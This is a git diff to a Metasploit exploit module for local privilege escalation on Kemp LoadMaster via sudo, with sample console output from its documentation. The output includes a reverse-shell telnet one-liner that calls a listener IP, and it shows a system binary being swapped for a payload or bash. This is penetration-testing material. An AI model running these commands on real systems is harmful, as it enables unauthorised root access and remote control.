diff --git a/documentation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md b/documentation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md index c9d02c26b82b..798e8a0e9148 100644 --- a/documentation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md +++ b/documentation/modules/exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.md @@ -73,13 +73,13 @@ msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run [*] Running automatic check ("set AutoCheck false" to disable) [*] Found 3 indicators this is a KEMP product [!] The service is running, but could not be validated. -[*] Execute dropper -[*] Moving /bin/loadkeys to /tmp/.xcglzfitgpg -[*] Moving /tmp/.feooibtpp to /bin/loadkeys +[*] Writing payload to /tmp/.rypuliojtdch +[*] Moving /bin/loadkeys to /tmp/.qyiojnfbnfc +[*] Moving /tmp/.rypuliojtdch to /bin/loadkeys [*] Running /bin/loadkeys -[+] Deleted /tmp/.feooibtpp -[*] Meterpreter session 8 opened (10.5.135.201:4444 -> 10.5.134.141:28858) at 2024-05-03 12:05:12 -0500 -[*] Moving /tmp/.xcglzfitgpg to /bin/loadkeys +[+] Deleted /tmp/.rypuliojtdch +[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.141:28850) at 2024-05-10 08:50:39 -0500 +[*] Moving /tmp/.qyiojnfbnfc to /bin/loadkeys [+] /bin/loadkeys returned to original contents meterpreter > sysinfo @@ -108,7 +108,7 @@ Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024): WRITABLE_DIR /tmp yes A directory where we can write files -Payload options (cmd/unix/reverse_awk): +Payload options (cmd/unix/reverse): Name Current Setting Required Description ---- --------------- -------- ----------- @@ -128,17 +128,27 @@ View the full module info with the info, or info -d command. msf6 exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run -[*] Started reverse TCP handler on 10.5.135.201:4444 +[+] sh -c '(sleep 4376|telnet 10.5.135.201 4444|while : ; do sh && break; done 2>&1|telnet 10.5.135.201 4444 >/dev/null 2>&1 &)' +[*] Started reverse TCP double handler on 10.5.135.201:4444 [*] Running automatic check ("set AutoCheck false" to disable) [*] Found 3 indicators this is a KEMP product [!] The service is running, but could not be validated. -[*] Execute command -[*] Moving /bin/loadkeys to /tmp/.twqrvjasafa +[*] Preparing payload command +[*] Moving /bin/loadkeys to /tmp/.mnqdvfwutfd [*] Moving /bin/bash to /bin/loadkeys [*] Running payload command -[*] Command shell session 7 opened (10.5.135.201:4444 -> 10.5.134.141:16589) at 2024-05-03 12:02:00 -0500 +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo igZFhKRnh9GplIdu; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket A +[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\nigZFhKRnh9GplIdu\r\n" [*] -[*] Moving /tmp/.twqrvjasafa to /bin/loadkeys +[*] Moving /tmp/.mnqdvfwutfd to /bin/loadkeys +[*] Matching... +[*] B is input... [+] /bin/loadkeys returned to original contents ls diff --git a/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb b/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb index ed2a76d3168c..de18ca4d2df0 100644 --- a/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb +++ b/modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb @@ -108,7 +108,7 @@ def verify_copy(src, dest, elevate) end def execute_dropper(target_binary, binary_rename, temp_payload_path) - vprint_status('Execute dropper') + vprint_status("Writing payload to #{temp_payload_path}") write_file(temp_payload_path, generate_payload_exe) chmod(temp_payload_path) register_file_for_cleanup(temp_payload_path) @@ -120,7 +120,7 @@ def execute_dropper(target_binary, binary_rename, temp_payload_path) end def execute_command(target_binary, binary_rename, cmd) - vprint_status('Execute command') + vprint_status('Preparing payload command') # save copy of target_binary return unless verify_copy(target_binary, binary_rename, false) return unless verify_copy('/bin/bash', target_binary, true) @@ -134,6 +134,7 @@ def exploit if writable_dir.blank? || (writable_dir[-1] != '/') writable_dir += '/' end + fail_with(Failure::BadConfig, "Invalid WRITABLE_DIR: #{writable_dir}") unless directory?(writable_dir) target_binary = datastore['TARGET_BINARY'] binary_rename = writable_dir + ".#{Rex::Text.rand_text_alpha_lower(6..12)}" target_binary_hash = file_remote_digestmd5(target_binary)